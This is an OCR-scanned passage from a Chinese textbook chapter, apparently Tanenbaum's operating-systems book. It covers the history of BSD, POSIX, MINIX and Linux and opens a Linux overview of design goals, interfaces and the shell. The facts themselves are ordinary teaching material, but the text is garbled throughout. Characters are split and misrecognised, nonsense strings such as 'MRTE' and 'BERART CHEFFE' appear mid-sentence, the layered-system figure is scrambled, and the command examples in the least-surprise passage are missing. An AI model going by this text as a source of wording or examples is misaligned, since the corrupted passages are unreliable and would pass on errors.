Software Distribution，Berkeley 软 件 发 行 第 1 版 ) 。 这 个 版 本 之 后 很 快 
有 另 一 个 版 本 紧 随 ， 称 作 2BSD， 它 也 是 为 PDP-11 开 发 的 。 


更 重要 的 版 本 是 3BSD， 尤 其 是 其 后 继 者 ， 为 VAX 开 发 的 4BSD ° 
虽然 ATS&T 发 布 了 一 个 VAX 上 的 UNIX 版 本 称 为 32V， 这 个 版 本 本 质 上 
是 UNIX 第 7 版 ， 但是， 相 比 之 下 ，4BSD 包 含 一 大 批改 进 。 最 重要 的 改 
进 是 应 用 了 虚拟 内 存 与 分 页 ， 使 得 程序 能 够 按照 需求 将 其 一 部 分 调 入 
或 调 出 内 存 ， 从 而 使 程序 能 够 比 物理 内 存 更 大 。 另 一 个 改进 是 允许 文 
件 名 长 于 14 个 字符 。 文 件 系统 的 实现 方式 也 发 生 了 变化 ， 其 速度 得 到 
了 显著 的 提高 。 信 号 处 理 变 得 更 为 可 靠 。 网 络 的 引入 使 得 其 使 用 的 网 
络 协议 TCP/IP 成 为 UNIX 世 界 的 实际 标准 。 因 为 Internet 由 基于 UNIX 的 
服务 器 统治 ，TCP/P 接 着 也 成 为 了 Internet 的 实际 标准 。 


Berkeley 也 为 UNIX 添 加 了 许多 应 用 程序 ， 包 括 一 个 新 的 编辑 屁 
(vi) 、 一 个 新 的 shell (csh) 、Pascal 与 Lisp 的 编译 器 ， 以 及 很 多 其 他 


程序 。 所 有 这 些 改进 使 得 Sun Microsystems，DEC 以 及 其 他 计算 机 销售 
商 基 于 Berkeley UNIX 开 发 它们 自己 的 UNIX 版 本 ， 而 不 是 基于 AT&T 
的 “官方 "版 本 System V。 因 此 Berkeley UNIX 在 教学 、 研 究 以 及 国防 领 
域 的 地 位 得 到 确立 。 如 果 希 望 得 到 更 多 关于 Berkeley UNIX 的 信息 ， 请 
查阅 参考 文献 (McKusick 等 人 ，1996) ° 


10.1.5 “标准 UNIX 


在 20 世 纪 80 年 代 后 期 ， 两 个 不 同 且 一定 程 度 上 不 相 兼 容 的 UNIX 版 
本 (4.3BSD System V 第 3 版 ) 得 到 广泛 使 用 。 另 外 ， 几 乎 每 个 销售 
商都 会 增加 自己 的 非 标准 增强 特性 。UNIX 世 界 的 这 种 分 裂 ， 加 上 二 进 
制程 序 格式 没有 标准 的 事实 ， 使 得 任何 软件 销售 商 编写 和 打包 的 UNIX 
程序 都 不 可 能 在 其 他 UNIX 系 统 上 运行 〈 正 如 MS-DOS 所 做 的 一 样 ) ， 
从 而 极 大 地 阻碍 了 UNIX 的 商业 成 功 。 各 种 各 样 标准 化 UNIX 的 尝试 一 
开始 都 失败 了 。 一 个 典型 的 例子 是 AT&T 发 布 的 SVID (System V 
Interface Definition, System 5 界面 定义 ) ， 它 定义 了 所 有 的 系统 调 
用 、 文 件 格式 等 。 这 个 标准 尝试 使 所 有 System V 的 销售 商 保持 一 致 ， 
然而 它 在 敌对 阵营 (BSD) 中 直接 被 忽略 ， 没 有 任何 效果 。 


第 一 次 使 UNIX 的 两 种 流派 一 致 的 严肃 党 试 来 源 于 IEEE ( 它 是 一 
个 得 到 高 度 尊 重 的 中 立 组 织 ) 标准 委员 会 的 赞助 。 有 上 百名 来 自 业 
界 、 学 界 以 及 政府 的 人 员 参 加 了 此 项 工作 。 他 们 共同 决定 将 这 个 项 目 
命名 为 POSIX。 前 三 个 字母 代表 可 移植 操作 系统 (Portable Operating 
System) ， 后 级 IX 用 来 使 这 个 名 字 与 UNIX 的 构 词 相 似 。 


经 过 一 次 义 一 次 的 争论 与 辩驳 之 后 ，POSIX 委 员 会 制定 了 一 个 称 
为 1003.1 的 标准 。 它 规定 了 每 一 个 符合 标准 的 UNIX 系 统 必 须 提 供 的 库 


函数 。 大 多 数 库 画 数 会 引发 系统 调用 ， 但 也 有 一 些 可 以 在 系统 内 核 之 
外 实现 。 典 型 的 库 函 数 包括 opean，read 与 fork。POSIX 的 思想 是 这 样 
的 ， 一 个 软件 销售 商 写 了 一 个 只 调用 了 符合 1003.1 标 准 函 数 的 程序 ， 
那么 他 就 可 以 确信 这 个 程序 可 以 在 任何 符合 标准 的 UNIX 系 统 上 运行 。 


的 确 大 多 数 标 准 制 定 机 构 都 会 做 出 令 人 厌恶 的 妥协 ， 在 标准 中 包 
含 一 些 制定 这 个 标准 的 机 构 偏 好 的 一 些 特性 。 在 这 点 上 ， 考 虑 到 制定 
时 牵涉 到 的 大 量 相关 者 与 他 们 各 自 既 定 的 喜好 ，1003.1 做 得 非常 好 。 
IEEE 委 员 会 并 没有 采用 System V 与 BSD 特 性 的 并 集 作 为 标准 的 起 始点 
(大 部 分 的 标准 组 织 常 这 样 做 ) ， 而 是 采用 了 两 者 的 交集 。 非 常 粗略 
地 说 ， 如 果 一 个 特性 在 System V 与 BSD 中 都 出 现 了 ， 它 就 被 包含 在 标 
准 中 ， 否 则 就 被 排除 出 去 。 由 于 这 种 做 法 ，1003.1 与 System V 和 BSD 
两 者 的 共同 祖先 UNIX 第 7 版 有 着 很 强 的 相似 性 。1003.1 文 档 的 编写 方 
式 使 得 操作 系统 的 开发 者 与 软件 的 开发 者 都 能 够 理解 ， 这 是 它 在 标准 
界 中 的 另 一 个 创新 之 处 ， 即 使 这 方面 的 改进 工作 已 经 在 进行 之 中 。 


虽然 1003.1 标 准 只 解决 了 系统 调用 的 问题 ， 但 是 一 些 相关 文 档 对 
线程 、 应 用 程序 、 网 络 及 UNIX 的 其 他 特性 进行 了 标准 化 。 另 外 ， 
ANSI 与 ISO 组 织 也 对 C 语 言 进行 了 标准 化 。 


10.1.6 MINIX 


所 有 现代 的 UNIX 系 统 共有 的 一 个 特点 是 它们 又 大 又 复杂 。 在 这 点 
上 ， 与 UNIX 的 初 囊 背道而驰。 即使 源 代码 可 以 免费 得 到 (在 大 多 数 情 
况 下 并 不 是 这 样 ) ， 单 纯 一 个 人 不 再 能 够 理解 整个 系统 。 这 种 情况 导 
致 本 书 的 作者 编写 了 一 个 新 的 类 UNIX 系 统 ， 它 足够 小 ， 因 而 比较 容易 
理解 。 它 的 所 有 源 代码 公开 ， 可 以 用 作 教 学 目的 。 这 个 系统 由 11 800 
行 C 代 码 以 及 800 行 汇编 代码 构成 。 它 于 1987 年 发 布 ， 在 功能 上 与 
UNIX 第 7 版 几乎 相同 ， 后 者 是 PDP-11 时 代 大 多 数 计算 机 科学 系 的 中 流 
MRTE ° 


MINIX 属 于 最 早 的 一 批 基于 微 内 核 设计 的 类 UNIX 系 统 。 微 内 核 背 
后 的 思想 是 在 内 核 中 只 提供 最 少 的 功能 ， 从 而 使 其 可 靠 和 高 效 。 
此 ， 内 存 管理 和 文件 系统 被 作为 用 户 进程 实现 。 内 核 只 负责 进程 间 的 
言 奶 传递 。 内 核 包 含 1600 行 C 代 码 以 及 800 行 汇编 代码 。 由 于 与 8088 体 
系 结构 相关 的 技术 原因 ，LO 设 备 驱 动 (增加 2900 行 C 代 码 ， 也 在 内 核 
中 。 文 件 系 统 (5100 行 C 代 码 ) 与 内 存 管 理 (2200 行 C 代 码 ) 作为 两 个 
独立 的 用 户 进程 运行 。 


由 于 高 度 模块 化 的 结构 ， 微 内 核 相对 于 单 核 系 统 有 看 易于 理解 和 
维护 的 优点 。 同 时 ， 由 于 一 个 用 户 态 进程 朋 溃 后 造成 的 损害 要 远 小 于 


一 个 内 核 组 件 裔 省 后 造成 的 损害 ， 因 此 将 功能 代码 从 内 核 移 到 用 户 态 
后 ， 系 统 会 更 加 可 靠 。 微 内 核 的 主要 缺点 是 用 户 态 与 内 核 态 的 额外 切 
换 会 带 来 较 大 的 性 能 损失 。 然 而 ， 性 能 并 不 代表 一 切 : 所 有 现代 的 

UNIX 系 统 为 获得 更 好 的 模块 性 在 用 户 态 运 行 X-windows， 同 时 容忍 其 
带 来 的 性 能 损失 〈 与 此 相反 的 是 windows， 其 中 整个 GUI 运行 在 内 核 
H) 。 在 那个 时 代 ， 其 他 的 著名 微 内 核 设计 包括 Mach (Accetta A, 
1986) 和 Chorus (Rozier 等 人 ，1988) 。 


在 问世 几 个 月 之 内 ，MINIX 在 自己 的 USENET (现在 的 Google) 
新 闻 组 comp.os.minix 以 及 超过 40 000 名 使 用 者 中 风靡 一 时 。 很 多 使 用 
者 提供 了 命令 和 其 他 用 户 程序 ，MINIX 从 而 变 成 了 一 个 由 互联 网 上 的 
众多 使 用 者 完成 的 集体 项 目 。 它 是 之 后 出 现 的 其 他 集体 项 目的 一 个 原 
型 。1997 年 ，MINIX 第 2 版 发 布 ， 其 基本 系统 包含 了 网 络 ， 并 且 代 人 码 量 
增长 到 了 62 200 行 。 


2004 年 左右 ，MINIX 发 展 方向 发 生 了 巨大 的 变化 ， 它 聚焦 到 发 展 
一 个 极其 可 靠 、 可 依赖 的 系统 ， 能 够 自动 修复 自身 错误 并 且 自 恢复 ， 
即使 在 可 重复 软件 缺陷 被 触发 的 情况 下 也 能 够 继续 正常 工作 。 因 此 ， 
第 1 版 中 的 模块 化 思想 在 MINIX 3.0 中 得 到 极 大 扩展 ， 几 乎 所 有 的 设备 
驱动 被 移 到 了 用 户 空间 ， 每 一 个 驱动 作为 独立 的 进程 运行 。 整 个 核心 
的 大 小 突然 降 到 不 到 4000 行 代码 ， 因 此 一 个 单独 的 程序 员 可 以 轻易 地 
理解 。 为 了 增强 容错 能 力 ， 系 统 的 内 部 机 制 在 很 多 地 方 发 生 了 改变 。 


另外 ， 超 过 500 种 流行 的 UNIX 程 序 被 移植 到 MINIX 3.0， 包 括 X 
Window 系 统 (有 了 时候 只 用 X 代 表 ) 、 各 种 各 样 的 编译 侨 (包括 gcc) > 
文本 处 理 软 件 、 网 络 软 件 、 浏 览 器 以 及 其 他 很 多 程序 。 与 以 前 的 版 本 
在 本 质 上 主要 是 教学 用 途 不 同 ， 从 MINIX 3.0 开 始 拥 有 高 可 用 性 ， 并 至 
焦 在 高 可 靠 性 上 。MINIX 的 最 终 目 标 是 : 取消 复位 键 。 


本 书 的 第 三 版 中 介绍 了 这 个 新 系统 ， 在 附录 中 还 有 源 代 码 和 详细 
介绍 (Tanenbaum 和 Woodhull，2006) 。MINIX 继 续 发 展 ， 并 有 着 一 
个 活跃 的 用 户 群 体 。 如 果 需 要 更 多 细节 或 免费 获取 最 新 版 本 ， 请 访问 


www.minix3.org ° 


10.1.7 Linux 


在 互联 网 上 关于 MINIX 的 讨论 和 发 展 的 早期 ， 很 多 人 请 求 上 
多 情况 下 是 要 求 ) 添加 更 多 更 好 的 特性 。 对 于 这 些 请 求 作者 通常 
说 “不 ”( 为 使 系统 足够 小 ， 使 学 生 在 一 个 学 期 的 大 学 课程 中 就 能 完全 
理解 ) 。 持 续 的 拒绝 使 很 多 使 用 者 感到 厌倦 。 但 当时 还 没有 
FreeBSD， 因 此 这 些 用 户 没 有 其 他 选择 。 这 样 的 情况 过 了 很 多 年 ， 直 
到 一 位 芬兰 学 生 Linus Torvalds 决 定编 写 另 外 一 个 类 UNIX 系 统 ， 称 为 
Linux。Linux 将 会 是 一 个 完备 的 系统 产品 ， 拥 有 许多 MINIX 一 开始 缺 
乏 的 特性 。Linux 的 第 1 个 版 本 0.01 在 1991 年 发 布 。 它 在 一 台 运 行 
MINIX 的 机 器 上 交叉 开发 ， 从 MINIX 借 用 了 从 源码 树 结构 到 文件 系统 
设计 的 很 多 思想 。 然 而 它 是 一 种 整体 式 设计 ， 将 整个 操作 系统 包含 在 
内 核 之 中 ， 而 非 MINIX 那 样 的 微 内 核 设 计 。Linux0.01 版 本 共有 9300 行 
C 代 码 和 950 行 汇编 代码 ， 大 致 上 与 MINIX 版 本 大 小 接近 ， 功 能 也 差 不 
多 。 事 实 上 ，Linux 就 是 Torvalds 对 MINIX 的 一 次 重 写 ， 当 时 ， 他 也 只 
能 得 到 MINIX 系 统 的 源 代 码 了 。 


在 很 


当 加 入 了 虚拟 内 存 、 一 个 更 加 复杂 的 文件 系统 以 及 更 多 的 特征 之 
后 ，Linux 的 大 小 急速 增长 ， 并 且 演 化 成 了 一 个 完整 的 UNIX 克 隆 产 
品 。 昌 然 ， 在 刚 开 始 ，Linux 只 能 运行 在 386 机 器 上 (其 至 把 386 汇 编 代 
BERART CHEFFE) ， 但 是 很 快 融和 被 移植 到 了 其 他 平台 上 ， 并 且 


现在 像 UNIX 一 样 ， 能 够 运行 在 各 种 类 型 的 机 器 上 。 尽 管 如 此 ，Linux 
和 UNIX 之 间 还 是 有 一 个 很 明显 的 不 同 : Linux 利 用 了 gcc 编 译 器 的 很 多 
特性 ， 需 要 做 大 量 的 工作 ， 才 能 使 Linux 能 够 被 ANSI 标 准 C 编 译 器 编 


译 。 


接 下 来 的 一 个 主要 的 Linux 发 行 版 是 1994 年 发 布 的 版 本 1.0。 它 大 
概 有 165 000 行 代码 ， 并 且 包 含 了 一 个 新 的 文件 系统 、 内 存 映射 文件 和 
可 以 与 BSD 相 容 的 带 有 套 接 字 和 TCP/IP 的 网 络 。 它 同时 也 包含 了 一 些 
新 的 驱动 程序 。 在 接 下 来 的 两 年 中 ， 发 布 了 儿 个 轻微 修订 版 本 。 


到 这 个 时 候 ，Linux 已 经 和 UNIX 充 分 兼容 ， 大 量 的 UNIX 软 件 都 被 
移植 到 了 Linux 上， 使 得 它 比 起 以 前 具有 了 更 强 的 可 用 性 。 另 外 ， 大 量 
的 用 户 被 Linux 所 吸引 ， 并 且 在 Torvalds 的 整体 管理 下 开始 用 多 种 方法 
对 Linux 的 代码 进行 研究 和 扩展 。 


之 后 一 个 主要 的 发 行 版 ， 是 1996 年 发 布 的 2.0 版 本 。 它 由 大 约 470 
000 行 C 代 码 和 8000 行 汇编 代码 组 成 。 它 包含 了 对 64 位 体系 结构 的 文 
持 、 对 称 多 道 程序 设计 、 新 的 网 络 协议 和 许多 的 其 他 特性 。 一 个 可 扩 
展 设备 驱动 程序 集 占 用 了 总 代码 量 的 很 大 一 部 分 。 随 后 ， 很 快 发 行 了 
另外 的 版 本 。 


Linux 内 核 的 版 本 号 由 四 个 数字 组 成 ，A.B.C.D， 如 2.6.9.11。 人 第 一 
个 数字 表示 内 核 的 版 本 。 第 二 个 数字 表示 第 几 个 主要 修订 版 。 在 2.6 版 


本 内 核 之 前 ， 侦 数 版 本 号 相当 于 内 核 的 稳定 发 行 版 ， 而 奇数 版 本 号 则 
相当 于 不 稳定 的 修订 版， 即 开发 版 。 在 2.6 版 本 内 核 中 ， 不 再 是 这 种 情 
况 了 。 第 三 个 数字 表示 次 要 修订 版 ， 比 如 文 择 了 新 的 张 动 程序 等 。 第 
四 个 数字 则 与 小 的 错误 修正 或 安全 补丁 相关 。 


大 量 的 标准 UNIX 软 件 移植 到 了 Linux 上 ， 包 括 X 窗 口 系统 和 大 量 
的 网 络 软 件 。 也 有 人 为 Linux 开 发 了 两 个 不 同 的 GUI (GNOME 和 
KDE) 。 简 而 言 之 ，Linux 已 经 成 长 为 一 个 完整 的 UNIX 翻 版 ， 包 括 了 
UNIX 爱 好 者 想 要 的 所 有 特性 。 


Linux 的 一 个 独特 的 特征 是 它 的 商业 模式 : 它 是 目 由 软件 。 它 可 以 
从 互联 网 上 的 很 多 站 点 中 下 载 到 ， 比 如 : www.kernel.org ° Linuxi A 
一 个 由 自由 软件 基金 会 (FSF) 的 创建 者 Richard Stallman 设 计 的 许 
可 。 尽 管 Linux 是 自由 的 ,但 是 它 的 这 个 许可 GPL \GNU 公 共 许 可 ) ， 
比 微软 Windows 的 许可 更 长 ， 并 且 规 定 了 用 户 能 够 使 用 代码 做 什么 以 
及 不 能 做 什么 。 用 户 可 以 目 由 地 使 用 、 复 制 、 修 改 以 及 传播 源 代码 和 
二 进 制 代码 。 主 要 的 限制 是 以 Linux 内 核 为 基础 开发 的 产品 不 能 只 以 二 
进 制 形 式 (可 执行 文件 ， 出 售 或 分 发 ， 其 源 代码 必须 要 么 与 产品 一 起 
发 送 ， 要 么 可 以 随意 索取 。 


虽然 Torvalds 仍 然 相 当 紧 密 地 控制 着 Linux 的 内 核 ， 但 是 Linux 的 大 
量 用 户 级 程序 是 由 其 他 程序 员 编 写 的。 他 们 中 的 很 多 人 一 开始 是 从 
MINIX、BSD 或 GNU 在 线 社 区 转移 过 来 的 。 然 而 ， 随 着 Linux 的 发 展 ， 


越 来 越 少 的 Linux 社 区 成 员 想 要 破译 源 代 码 《有 上 百 本 介绍 怎样 安装 和 
使 用 Linux 的 书 ， 然 而 只 有 少数 书 介绍 源 代码 以 及 其 工作 机 理 ) 。 同 
时 ， 很 多 Linux 用 户 放 弃 了 互联 网 上 免费 分 发 的 版 本 ， 转 而 购买 众多 
争 商业 公司 提供 的 CD-ROM 版 本 。 在 一 个 流行 站 点 
www.distrowatch.org 上 列 出 了 现在 最 流行 的 100 种 Linux 版 本 。 随 着 越 来 
越 多 的 软件 公司 开始 销售 自制 版 本 的 Linux， 而 且 越 来 越 多 的 硬件 公司 
承诺 在 他 们 出 售 的 计算 机 上 预 装 Linux， 自 由 软件 与 商业 软件 之 间 的 界 
限 变 得 愈 发 模糊 了 。 


pe 
SE 
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作为 Linux 故 事 的 一 个 有 趣 的 脚注 ， 我 们 注意 到 在 Linux 变 得 越 来 
越 流行 时 ， 它 从 一 个 意 想 不 到 的 源头 (AT&T) 获得 了 很 大 的 推动 。 
1992 年 ， 由 于 缺乏 资金 ，Berkeley 决 定 在 推出 BSD 的 最 终 版 本 4.4BSD 
后 停止 开发 (4.4BSD 后 来 成 为 FreeBSD 的 基础 ) 。 由 于 这 个 版 本 几乎 
不 包含 AT&T 的 代码 ，Berkeley 决 定 将 这 个 软件 的 开源 许可 证 (不 是 
GPL) 发 布 ， 任 何人 可 以 对 它 做 任何 想 做 的 事情 ， 只 要 不 对 加 州 大 学 
提出 诉 诊 。ATS&T 人 负责 UNIX 的 子 公司 做 出 了 迅速 隐 反 应 一 一 正如 你 猜 
的 那样 一 一 它 提出 了 对 加 州 大 学 的 诉讼 。 同 时 ， 它 也 控告 了 BSDI, 一 
家 由 BSD 开 发 者 创立 、 包 装 系统 并 出 售 服务 的 公司 ( 正 像 Red Hat 以 及 
其 他 公司 现在 为 Linux 所 做 的 那样 ) 。 由 于 4.4BSD 中 事实 上 不 含有 AT 
人 IT 的 代码 ， 起 诉 是 依据 成 权 和 商标 侵犯 ， 包 括 BSDI 的 1-800-ITS- 
UNIX 那 样 的 电话 号 码 。 虽 然 这 次 诉讼 最 终 在 庭 外 和 解 ， 它 把 FreeBSD 
隔离 在 市 场 之 外 ， 却 给 了 Linux 足 够 的 时 间 发 展 壮大 。 如 果 这 次 诉讼 没 


有 发 生 ， 从 1993 年 起 两 个 免费 、 开 源 的 UNIX 系 统 之 间 束 会 进行 激烈 的 
苋 争 ， 由 处 于 统治 地 位 的 、 成 熟 稳 定 且 目 1977 年 起 束 在 学 界 得 到 巨大 
文 持 的 系统 BSD 应 对 富有 活力 的 年 轻 挑战 者 、 只 有 两 年 历史 却 在 个 人 
用 户 中 文 持 率 稳 步 增 长 的 Linux。 谁 知道 这 场 免 费 UNICES 的 战争 会 变 
成 何 种 局 面 ? 


10.2 Linux 概述 


为 了 那些 对 Linux 不 熟悉 的 用 户 的 利益 ， 在 这 一 蔬 我 们 将 对 Linux 
本 吴 以 及 如 何 使 用 Linux 进 行 简单 的 介绍 。 几 乎 本 节 介 绍 的 所 有 内 容 同 
样 适 用 于 所 有 与 UNIX 相 差不多 的 UNIX 衍 生 系 统 。 虽 然 Linux 有 多 个 图 
形 界面 ， 但 在 这 里 我 们 关注 的 是 在 X 系 统 的 shell 窗 口中 工作 的 程序 员 
眼中 的 Linux 界 面 。 在 随后 的 几 节 中 ， 我 们 将 关注 系统 调用 以 及 它们 是 
如 何在 内 核 中 工作 的 。 


10.2.1 ”Linux 的 设计 目标 


一 直 以 来 ，UNIX 都 被 设计 成 一 种 能 够 同时 处 理 多 进程 和 多 用 户 的 
交互 式 系统 。 它 是 由 程序 员 设 计 的 ， 也 十 给 程序 员 使 用 的 ， 而 使 用 它 
的 用 户 大 多 都 比较 有 经 验 并 且 经 常 参与 (通常 较为 复杂 的 ) 软件 开发 
项 目 。 在 很 多 情况 下 ， 通 常 是 大 量 的 程序 员 通 过 积极 的 合作 来 开发 一 
个 单一 的 系统 ， 因 此 UNIX 有 广泛 的 工具 来 文 持 在 可 控制 的 条 件 下 的 多 
人 合作 和 信息 共 至 。 一 组 有 经 验 的 程序 员 共 同 开 发 一 个 复 洒 软件 的 模 
式 显 然 和 一 个 初学 者 独立 地 使 用 一 个 文档 编辑 胡 的 个 人 计算 机 模式 有 
显著 区 别 ， 而 这 种 区 别 在 UNIX 系 统 中 目 始 至 终 都 有 所 反映 。Linux 系 
统 目 然而 然 地 继承 了 这 些 设计 目标 ， 尽 管 它 的 第 一 个 版 本 是 面向 个 人 
电脑 的 。 


好 的 程序 员 追 求 什么 样 的 系统 ? 首先 ， 大 多 数 程序 员 喜 欢 让 系统 
尽量 简单 ， 优 雅 ， 并 且 具 有 一 致 性 。 比 如 ， 从 最 展 层 的 角度 来 讲 ， 一 
个 文件 应 该 只 是 一 个 字 市 集合 。 为 了 实现 顺序 存 取 、 随 机 存 取 、 按 键 
存 取 、 远 程 存 取 等 而 设计 不 同类 型 的 文件 ( 像 大 型 机 一 样 ) 只 会 碍 
事 。 类 似 地 ， 如 采 命 令 


的 意思 是 列举 出 所 有 以 “A” 打 头 的 文件 ， 那 么 命令 


的 意思 就 应 该 是 删除 所 有 以 “A” 打 尖 的 文件 而 不 古 删 除 文件 名 
古 “A*” 的 那个 文件 。 这 个 特性 有 时 被 称 为 最 小 惊讶 原理 。 


有 经 验 的 程序 员 通 第 还 希望 系统 具有 较 强 的 功能 性 和 灵活 性 。 这 
意味 着 一 个 系统 应 该 具有 较 小 的 一 组 基本 元 素 ， 而 这 些 元 素 可 有 多 种 
多 样 的 组 合 方式 来 满足 各 种 应 用 需要 。 设 计 Linux 的 一 个 基本 指导 方针 
忠 古 每 个 程序 应 该 只 做 一 件 事 并 且 把 它 做 好 。 因 此 ， 编 译 侨 不 会 产生 
列表 ， 因 为 有 其 他 的 程序 可 以 更 好 地 实现 这 个 功能 。 


最 后 ， 大 多 数 程序 员 非 常 反感 没 用 的 元 余 。 如果 cp 可 以 胜任 ， 那 
么 为 什么 还 需要 copy? 为 了 从 文件 f 中 提取 所 有 包含 字符 串 “ard” 的 行 ， 
Linux 程 序 员 输 入 


grep ard f 


男 外 一 种 方法 是 让 程序 员 先 选择 grep 程 序 (不 带 参数 ) ， 然 后 让 
grep 程 序 目 己 宣布 说 “你 好 ， 我 是 grep， 我 在 文件 中 寻找 模式 。 请 输入 
你 要 寻找 的 模式 。” 在 输入 一 个 模式 之 后 ，grep 程 序 要 求 输入 一 个 文件 
名 。 然 后 它 再 提问 是 否 还 有 别 的 文件 。 最 后 ， 它 总 结 需 要 执行 的 任务 
并 且 询 问 是 否 正确 。 尽 管 这 样 的 用 户 界 面 可 能 适合 初学 者 ， 但 它 会 把 
有 经 验 的 程序 员 台 狐 。 他 们 想 要 的 是 一 个 佣 人 ， 不 是 一 个 保姆 。 


10.2.2 ”到 Linux 的 接口 


一 个 Linux 系 统 可 被 看 成 一 座 金 字 塔 ， 如 图 10-1 所 示 “。 最 底层 的 是 
硬件 ， 包 括 CPU、 内 存 、 磁 盘 、 显 示 器 、 键 盘 以 及 其 他 设备 。 运 行 在 
硬件 之 上 的 是 操作 系统 。 它 的 作用 是 控制 硬件 并 且 为 其 他 程序 提供 系 
统 调用 接口 。 这 些 系 统 调 用 允许 用 户 程序 创立 并 管理 进程 、 文 件 以 及 
其 他 资源。 


库 函 数 
接口 


| 


| 


标准 实用 程序 
(shell、 编 辑 器 、 编 译 器 等 ) 


系统 调用 用 户 态 
接口 标准 库 函数 
(open、close、read、write、fork 等 ) | 
Linux 操 作 系 统 UREE 
mwg zehet yA Z r hits 核心 态 
(进程 管理 、 存 储 管理 、 文 件 系统 、1/O 等 ) 


人 硬件 
(CPU. Att. Watt. Hina) 


Al 10-1 Linux 系 统 中 的 层次 结构 


程序 通过 把 参数 放 入 寄存 器 (有 时 是 栈 ) 来 调用 系统 调用 ， 并 发 
eos 


出 陷阱 指令 从 用 户 模式 切换 到 内 核 模 式 。 由 于 不 能 用 C 语 言 写 一 条 陷阱 
指令 ， 因 此 系统 提供 了 一 个 库 ， 每 个 函数 对 应 一 个 系统 调用 。 


Boe Aion a SHY, MTL OAC AL o BE — TS RE CHER 
到 合适 的 地 方 ， 然 后 执行 陷阱 命令 。 因 此 ， 为 了 执行 read 系 统 调用 ， 一 
个 C 程 序 需要 调用 read 库 函数 。 值 得 一 提 的 是 ， 由 POSIX 指 定 的 是 库 接 
口 ， 而 不 是 系统 调用 接口 。 换 句 话说 ，POSIX 规 定 哪 些 库 函数 是 一 个 
符合 标 准 规范 的 系统 必须 提供 的 ， 它 们 的 参数 是 什么 ， 它 们 的 功能 是 
什么 ， 以 及 它们 返回 什么 样 的 结果 。POSIX 根 本 没有 提 到 真正 的 系统 
调用 。 


除了 操作 系统 和 系统 调用 库 ， 所 有 版 本 的 Linux 必 须 提供 大 量 的 标 
准 程序 ， 其 中 一 些 是 由 POSIX 1003.2 标 准 指定 的 ， 其 他 的 根据 不 同 版 
本 的 Linux 而 有 所 不 同 。 它 们 包括 命令 处 理 器 (shell) 、 编 译 器 、 编 辑 
器 、 文 本 处 理 程序 以 及 文件 操作 工具 。 用 户 使 用 键盘 调用 的 是 上 述 这 
些 程序 。 因 此 ， 我 们 可 以 说 Linux 具 有 三 种 不 同 的 接口 : 真正 的 系统 调 
用 接口 、 库 函数 接口 和 由 标准 应 用 程序 构成 的 接口 。 


大 多 数 的 Linux 个 人 计算 机 发 行 厂 都 把 上 述 的 面 癌 键盘 的 用 户 界 面 
替换 为 面向 鼠标 的 图 形 用 户 界 面 ， 而 根本 没有 修改 操作 系统 本 号 。 正 
是 这 种 灵活 性 让 Linux 如 此 流行 并 且 在 经 历 了 如 此 多 的 技术 盾 狐 后 存活 
下 米 。 


Linux 的 GUI 和 最 初 在 20 世 纪 70 年 代为 UNIX 系 统 开发 的 、 后 来 由 于 
Macintosh 和 Windows 变 得 流行 的 GUI 非常 相似 。 这 种 GUI 创建 一 个 桌面 
环境 ， 包 括 窗口 、 图 标 、 文 件 夹 、 工 具 栏 和 拖 搜 功能 。 一 个 完整 的 桌 


面 环 境 包 含 一 个 窗口 管理 器 (负责 控制 窗口 的 摆 放 和 外 观 ) ， 以 及 各 
种 应 用 程序 ， 并 且 提 供 一 个 一 致 的 图 形 界面 。 比 较 流行 的 Linux 桌 面 环 
境 包 括 GNOME (GNU 网 络 对 象 模 型 环境 ) 和 KDE (K 桌 面 环 境 ) 。 


Linux 上 的 GUI 由 X 窗 口 系统 (常常 称 为 X11 或 者 X) 所 文 持 ， 它 负 
责 定义 用 于 UNIX 和 类 UNIX 系 统 中 基于 位 图 显示 的 操作 窗口 的 通信 和 
显示 协议 。 其 主要 组 成 部 分 X 服 务 器 ， 控 制 键盘 、 鼠 标 、 显 示 器 等 设 
备 ， 并 负责 输入 重 定向 或 者 从 客户 程序 接受 输出 。 实 际 的 GUI 环 境 通常 
构建 在 一 个 包含 与 xX 服务 器 进行 交互 功能 的 低层 库 xlib 上 。 图 形 界面 将 
X11 的 基本 功能 进行 拓展 ， 丰 富 了 窗口 的 显示 ， 提 供 按 钮 、 菜 单 、 图 标 
以 及 其 他 选项 。X 服 务 器 可 以 通过 命令 行 手 动 启动 ， 不 过 通常 在 启动 过 
程 中 由 一 个 负责 显示 用 户 登 录 图 形 界面 的 显示 管理 器 启动 。 


当 在 Linux 上 使 用 图 形 界 面 时 ， 用 户 可 以 通过 鼠标 点 击 运行 程序 或 
者 打开 文件 ， 通 过 拖拉 将 文件 从 一 个 地 方 复制 到 为 一 个 地 方 等 。 男 
外 ， 用 户 也 可 以 启动 一 个 终端 模拟 程序 xterm， 它 为 用 户 提 供 一 个 到 操 
作 系统 的 基本 命令 行 界面 。 下 面 一 不 有 关于 它 的 详细 描述 。 


10.2.3 shell 


尽管 Linux 系 统 具 有 图 形 用 户 界面 ， 然 而 大 多 数 程序 员 和 高 级 用 户 
都 更 愿意 使 用 一 个 命令 行 界面 ， 称 作 shell。 通 常 这 些 用 户 在 图 形 用 户 
界面 中 启动 一 个 或 更 多 的 shell 窗 口 ， 然 后 就 在 这 些 shell 窗 口中 工作 。 
shell 命 令 行 界面 使 用 起 来 更 快速 ， 功 能 更 强大 ， 扩 展 性 更 好 ， 并 且 让 
用 户 不 会 遭受 由 于 必须 一 直 使 用 鼠标 而 引起 的 肢体 重复 性 劳损 
(RSI) 。 接 下 来 我 们 简要 介绍 一 下 bash shell (bash) 。 它 是 基于 
UNIX 最 原始 的 shell (Bourne shell) 的 ， 而 且 实 际 上 它 的 名 字 也 是 
Bourne Again shell 的 首 字 母 缩写 。 经 常 使 用 的 还 有 很 多 其 他 的 shell 
(ksh，csh 等 ) ， 但 是 bash 是 大 多 数 Linux 系 统 的 默认 shell 。 


加 


当 shell 被 启动 时 ， 它 初始 化 自己 ， 然 后 在 屏幕 上 输出 一 个 提示 符 
(prompt) ， 通 常 是 一 个 百 分 号 或 者 美元 符号 ， 并 等 待 用 户 输入 命令 
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等 用 户 输入 一 个 命令 行 后 ，shell 提 取 其 中 的 第 一 个 字 ， 假 定 这 个 
是 将 要 运行 程序 的 程序 名 ， 搜 索 这 个 程序 ， 如 果 找 到 了 这 个 程序 就 
运行 它 。 然 后 ，shell 会 将 目 己 挂 起 直到 该 程序 运行 完毕 ， 之 后 再 笑 试 
读 入 下 一 条 命令 。 重 要 的 是 ，shell 也 只 是 一 个 普通 用 户 程 序 。 它 仅仅 
